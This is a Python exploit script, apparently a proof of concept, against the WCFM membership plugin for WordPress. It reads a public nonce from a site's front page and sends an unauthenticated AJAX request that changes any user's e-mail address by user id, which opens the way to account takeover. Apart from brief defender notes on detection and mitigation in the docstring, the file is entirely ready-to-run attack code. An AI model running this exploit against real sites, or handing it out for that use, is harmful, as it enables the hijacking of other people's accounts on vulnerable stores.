#!/usr/bin/python3
import sys
import getopt
import re
import requests
import json
from urllib.parse import urlencode
from bs4 import BeautifulSoup
def main(argv):
    """Proof-of-concept driver for the WCFM membership e-mail update issue.

    Parses the command line, reads the public ``wcfm_ajax_nonce`` from the
    site's front page, and sends one form-encoded request to
    ``/wp-admin/admin-ajax.php`` that asks the ``wcfm-memberships-registration``
    controller to set ``user_email`` for ``member_id``.  No cookie or other
    credential is attached to the request, so the plugin behaviour being
    demonstrated is that this controller accepts the change from an
    unauthenticated caller (presumably the missing check the upstream fix
    adds — verify against the plugin changelog).

    Args:
        argv: Command-line arguments without the program name.
            ``-w/--website_url`` site root, ``-e/--email`` new e-mail,
            ``-u/--user_id`` target user id; ``-h`` prints usage.

    Returns:
        None.  Calls ``sys.exit(2)`` on bad arguments, a missing URL or user
        id, or when the nonce cannot be found; ``sys.exit()`` for ``-h``.

    Raises:
        AttributeError: if the page has no ``<script id="wcfm_core_js-js-extra">``
            element (``.string`` is read from ``None``).
        json.JSONDecodeError: if the nonce blob or the AJAX reply is not JSON.
        KeyError: if the reply lacks ``status`` or, on failure, ``message``.

    Defender notes:
        * The nonce is a CSRF token that any visitor can read from the page;
          it is not an authorization check, which is why this request needs
          no login.
        * Detection: an unauthenticated POST to ``admin-ajax.php`` with
          ``action=wcfm_ajax_controller`` and
          ``controller=wcfm-memberships-registration`` whose inner form
          carries a ``member_id`` is the signature of this request.
        * Mitigation: update the plugin; until then, rate-limit or block the
          above request shape at the WAF/reverse proxy.
    """
    website_url = ''
    email = ''          # NOTE: never validated — an omitted -e sends an empty user_email
    user_id = ''
    try:
        opts, args = getopt.getopt(argv, 'hw:e:u:', ['website_url=', 'email=', 'user_id='])
    except getopt.GetoptError:
        print(
            'wclovers_wc_multivendor_membership_plugin_vdb_update_user_email_exploit.py -w <website_url> -e <email> -u <user_id>'
        )
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print(
                'wclovers_wc_multivendor_membership_plugin_vdb_update_user_email_exploit.py -w <website_url> -e <email> -u <user_id>'
            )
            sys.exit()
        elif opt in ('-w', '--website_url'):
            website_url = arg
        elif opt in ('-e', '--email'):
            email = arg
        elif opt in ('-u', '--user_id'):
            user_id = arg
    # format url
    # rstrip takes a *set* of characters: '\/' (a backslash and a slash) strips
    # any trailing run of '/' or '\' so the path can be appended below.
    website_url = website_url.rstrip('\/')
    # check website url
    if website_url == '':
        print('Please provide the WordPress website URL!')
        sys.exit(2)
    # check user id
    if user_id == '':
        print('Please provide the user id!')
        sys.exit(2)
    # get nonce value from js
    # WordPress inlines the plugin's localized params in a <script> with id
    # '<handle>-js-extra'; the nonce lives in the `var wcfm_params = {...};`
    # assignment inside it.  This is an unauthenticated GET of the front page.
    response = requests.get(website_url)
    soup = BeautifulSoup(response.text, 'html.parser')
    wcfm_core_js_element = soup.find('script', {'id': 'wcfm_core_js-js-extra'})
    # If the element is absent (plugin not installed/active) this raises
    # AttributeError rather than printing a message.
    wcfm_core_js = wcfm_core_js_element.string
    wcfm_params_match = re.search(r'var wcfm_params = ({.*?});', wcfm_core_js)
    if wcfm_params_match:
        json_string = wcfm_params_match.group(1)
        data = json.loads(json_string)
        wcfm_ajax_nonce = data['wcfm_ajax_nonce']
    else:
        print('Nonce is not found on the website.')
        sys.exit(2)
    # update user email request
    # The inner registration form is itself URL-encoded into a single field
    # (the controller expects a serialized form string); no session cookie is
    # sent, so the server sees an anonymous request.
    response = requests.post(website_url + '/wp-admin/admin-ajax.php',
                             headers={'Content-Type': 'application/x-www-form-urlencoded'},
                             data={
                                 'action': 'wcfm_ajax_controller',
                                 'wcfm_ajax_nonce': wcfm_ajax_nonce,
                                 'controller': 'wcfm-memberships-registration',
                                 'wcfm_membership_registration_form': urlencode({
                                     'user_email': email,
                                     'member_id': user_id,
                                     'user_name': '-',
                                 })
                             })
    response_json = json.loads(response.text)
    # `status` is used as a truthy flag; `message` is only read on failure.
    if response_json['status']:
        print('Successfully exploited! User\'s email updated!')
    else:
        # get error message
        print('Error: ' + response_json['message'])
if __name__ == '__main__':
    # CLI entry point: hand main() every argument after the program name.
    cli_args = sys.argv[1:]
    main(cli_args)